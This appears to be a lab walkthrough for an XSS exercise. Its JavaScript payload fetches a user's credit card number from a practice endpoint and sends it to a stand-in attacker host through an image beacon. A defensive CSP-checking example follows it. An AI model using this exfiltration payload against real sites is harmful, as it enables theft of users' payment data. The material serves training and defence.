This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

TASK_15.md

Task 15 [Try Now]

Objectives:

  1. Find John's Credit Card Number using an XSS vulnerability on this page
  2. Post the Credit Card Number to your Attacker Server

This is pretty much the same as TASK_14; only the URL and the delivery method have changed.

The target URL is http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore, and we have to send a POST XHR with the data user=john.

The POST body is passed to the .send method of the XHR object, as in this example:

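```javascript
const xhttp = new XMLHttpRequest();

// Runs on every state change; act only once the response has fully arrived.
xhttp.onreadystatechange = function () {
  if (this.readyState === 4 && this.status === 200) {
    // Forward the response body to the attacker server as a query parameter.
    new Image().src = "http://attacker-site.com?card=" + xhttp.responseText;
  }
};
// Asynchronous POST to the lab's cardstore endpoint.
xhttp.open("POST", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore", true);
// Declare the body as form-encoded so the server parses user=john as a form field.
xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// The POST body is the argument to send().
xhttp.send("user=john");
```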

For POC, Click Here
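From the defender's side, the following added example (not part of the original write-up or the lab) checks which of the two requests in the payload above a given Content-Security-Policy header would permit. The policy strings, the dummy card value, the same-origin page location and all function names are assumptions made for illustration, and the source matching is deliberately simplified.

```javascript
// Simplified CSP source matching: 'self' (exact origin), *, scheme sources
// such as https:, and hosts with optional scheme and "*." prefix. No ports/paths.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    if (name && !(name in policy)) policy[name] = sources; // first directive wins
  }
  return policy;
}

function sourceMatches(src, target, page) {
  const web = /^https?:$/.test(target.protocol);
  if (src === "*") return web;
  if (src === "'self'") return target.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return target.protocol === src;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)$/.exec(src);
  if (!m) return false; // 'none', nonces, hashes, ports, paths: treated as no match
  const [, scheme, wildcard, host] = m;
  if (scheme ? target.protocol !== scheme + ":" : !web) return false;
  return wildcard ? target.hostname.endsWith("." + host) : target.hostname === host;
}

// directive: "connect-src" governs the XHR, "img-src" the Image() beacon;
// both fall back to default-src when absent.
function cspAllows(header, directive, targetUrl, pageUrl) {
  const policy = parseCsp(header);
  const sources = policy[directive] ?? policy["default-src"];
  if (sources === undefined) return true; // nothing restricts this request type
  const target = new URL(targetUrl), page = new URL(pageUrl);
  return sources.some((s) => sourceMatches(s, target, page));
}

// Constructed inputs: URLs as in the payload above (card value is a dummy);
// the page is assumed to share the cardstore endpoint's origin.
const ENDPOINT = "http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore";
const BEACON = "http://attacker-site.com?card=0000";
const PAGE = new URL(ENDPOINT).origin + "/";
const WEAK = "default-src 'self'; img-src *";
const STRICT = "default-src 'self'";

const report = (header) => ({
  xhr: cspAllows(header, "connect-src", ENDPOINT, PAGE),
  beacon: cspAllows(header, "img-src", BEACON, PAGE),
});
console.log("weak:", report(WEAK), "strict:", report(STRICT));
```

Under the strict policy the same-origin XHR is still permitted and only the cross-origin image beacon is refused, so a policy like this limits exfiltration but the injection point itself still needs output encoding.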